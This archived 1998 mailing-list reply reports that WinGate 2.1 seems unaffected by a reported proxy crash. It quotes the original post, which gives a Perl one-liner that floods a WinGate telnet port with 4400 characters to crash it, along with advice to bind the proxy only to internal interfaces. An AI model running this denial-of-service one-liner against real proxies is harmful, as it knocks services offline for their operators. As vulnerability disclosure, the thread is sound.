Re: crashing wingates

From: Noam Rathaus (dolittleat_private)
Date: Sun Nov 15 1998 - 09:58:42 PST

Next message: Richard Reiner: "Vulnerability in Netscape & Microsoft Web browsers"

Previous message: Philip Stoev: "SerialPOP DoS"
Maybe in reply to: G23: "crashing wingates"
Next in thread: Kotu Srinivasa Reddy: "Re: crashing wingates"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a cryptographically signed message in MIME format.

--------------ms4A2A56A1B3180D3DD8A02218
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

I have to report that WinGate 2.1 seems to be unaffected.

G23 wrote:
>
> Hello,
>
> The following one-liner will crash an open Wingate.
>
> perl -MIO::Socket -e \
> 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
> ->send("X" x 4400 . "\n",0)'
>
> Unfortunately I don't have access to one that I can test,
> so I am unable to verify what versions are vulnerable.
> The above is my rendition of a 44 line sh script written
> by "rEWTED" (kefkaat_private).
>
> Anyone configuring a proxy for LAN use should only bind to an internal
> interface anyway.  (IE, kidz shouldn't even see your proxy)
> http://wingate.net/helppages/wingate2Securing_your_network.html
>
> If you do provide telnet proxy for the world, then at least log.
> http://wingate.net/helppages/wingate2Auditing_and_Logging.html
>
> ghost23
>
> ____________________________________________________________________
> Get free e-mail and a permanent address at http://www.netaddress.com/?N=1

--
Thanks
Noam Rathaus
http://members.xoom.com/dolittle
for Exchange Server Q&A : http://members.xoom.com/dolittle
PGP Key Fingerprint:  8AC7 62AD 860A 4327 3122  544F 34B6 F3A8 2515 7D02

"and - Change your quote already!" - Al Avi
--------------ms4A2A56A1B3180D3DD8A02218
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIIIOQYJKoZIhvcNAQcCoIIIKjCCCCYCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
BqcwggQiMIIDi6ADAgECAhBwjV0TvKpW56tEH6tMG+F6MA0GCSqGSIb3DQEBBAUAMGIxETAP
BgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVy
aVNpZ24gQ2xhc3MgMSBDQSAtIEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODA1MDYwMDAw
MDBaFw05OTA1MDYyMzU5NTlaMIIBHjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5kaXZpZHVh
bCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvQ1BT
IEluY29ycC4gYnkgUmVmLixMSUFCLkxURChjKTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENs
YXNzIDEgLSBOZXRzY2FwZSBGdWxsIFNlcnZpY2UxFTATBgNVBAMTDE5vYW0gUmF0aGF1czEm
MCQGCSqGSIb3DQEJARYXZG9saXR0bGVAaXNyYWVsbWFpbC5jb20wXDANBgkqhkiG9w0BAQEF
AANLADBIAkEAxVe7ScoMm3tcGnWN7gqTrkeVw0hPt+R0zTfCN2Hy6iwXFgcSopzHwQ2XZVAk
Ifl7Ft3y8ZOyhRveHlz+uJ0xjwIDAQABo4IBXTCCAVkwCQYDVR0TBAIwADCBrwYDVR0gBIGn
MIAwgAYLYIZIAYb4RQEHAQEwgDAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24u
Y29tL0NQUzBiBggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlTaWdu
J3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcgVmVyaVNpZ24A
AAAAAAAwEQYJYIZIAYb4QgEBBAQDAgeAMIGGBgpghkgBhvhFAQYDBHgWdmQ0NjUyYmQ2M2Yy
MDQ3MDI5Mjk4NzYzYzlkMmYyNzUwNjljNzM1OWJlZDFiMDU5ZGE3NWJjNGJjOTcwMTc0N2Rh
NWNmZWQxNDFiZWFkYjJiZDJlODkyMTJhOTY4ZjRkMTExNDg5ZmExYjI0M2Y0ZTQ5MDY1NDEw
DQYJKoZIhvcNAQEEBQADgYEAkKrsvDPLoIlu3uPUUHFaeQgg65ZTd+9VcNqzAyfHG8uNhOC/
wyEUYffENPhzpQnPoj2x0X6FXlWUKlywFuqv6hrHo6KXo7YdAWrkFNFA78kd4MIDrjGUKSG0
o9R5CHFMMkGuGIzEU2di+y3uDyzCLoyny78tkVICZlgJxfZIZfYwggJ9MIIB5qADAgECAhR1
E2tY84BpV3Wmok1ZEE2c6nZK8TANBgkqhkiG9w0BAQIFADBfMQswCQYDVQQGEwJVUzEXMBUG
A1UEChMOVmVyaVNpZ24sIEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVibGljIFByaW1hcnkg
Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNOTcwNjI0MDcwMDAwWhcNOTkwNjI0MDcwMDAw
WjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xNDAyBgNV
BAsTK1ZlcmlTaWduIENsYXNzIDEgQ0EgLSBJbmRpdmlkdWFsIFN1YnNjcmliZXIwgZ8wDQYJ
KoZIhvcNAQEBBQADgY0AMIGJAoGBALYUps9N0AUN2Moj0G+qtCmSY44s+G+W1y6ddksRsTaN
V8nD/RzGuv4eCLozypXqvuNbzQaot3kdRCrtc/KxUoNoEHBkkdc+a/n3XZ0UQ5tul0WYgUfR
Lcvdu3LXTD9xquJA8lQ5vBbuz3zsuts/bCqzFrGGEp2ukzTVuNXQ9z6pAgMBAAGjMzAxMBEG
CWCGSAGG+EIBAQQEAwIBBjAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjANBgkqhkiG
9w0BAQIFAAOBgQCSDEvpupPN/9rmYP2eZANmFS9WPDhMaEpHxfOrjyXZZkNzQxVzRL4USIFa
dwzMeurZsbzyi/8Rsd8UUEjcZR0LifmhXkhSb+21a/S4CEw48LmJZykP4OA396br1PTVQqld
/b3nnnwb50+FLQShYC6FuOvi+u8UBSYVGFVvE6EdcTGCAVowggFWAgEBMHYwYjERMA8GA1UE
BxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2ln
biBDbGFzcyAxIENBIC0gSW5kaXZpZHVhbCBTdWJzY3JpYmVyAhBwjV0TvKpW56tEH6tMG+F6
MAkGBSsOAwIaBQCgfTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEP
Fw05ODExMTUxNzU4NDNaMB4GCSqGSIb3DQEJDzERMA8wDQYIKoZIhvcNAwICASgwIwYJKoZI
hvcNAQkEMRYEFD07tlz1BUzSA5Q7KjK8Xoko0TCcMA0GCSqGSIb3DQEBAQUABEA0FMHMMZzf
pNGkMuxrtZupQn/S2V1HBI4taLMPAbBT3SU2NWwKbC3bqWBWerhTM0N9oNYW59HN/cnN+LZb
JiFK
--------------ms4A2A56A1B3180D3DD8A02218--

Next message: Richard Reiner: "Vulnerability in Netscape & Microsoft Web browsers"
Previous message: Philip Stoev: "SerialPOP DoS"
Maybe in reply to: G23: "crashing wingates"
Next in thread: Kotu Srinivasa Reddy: "Re: crashing wingates"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:31 PDT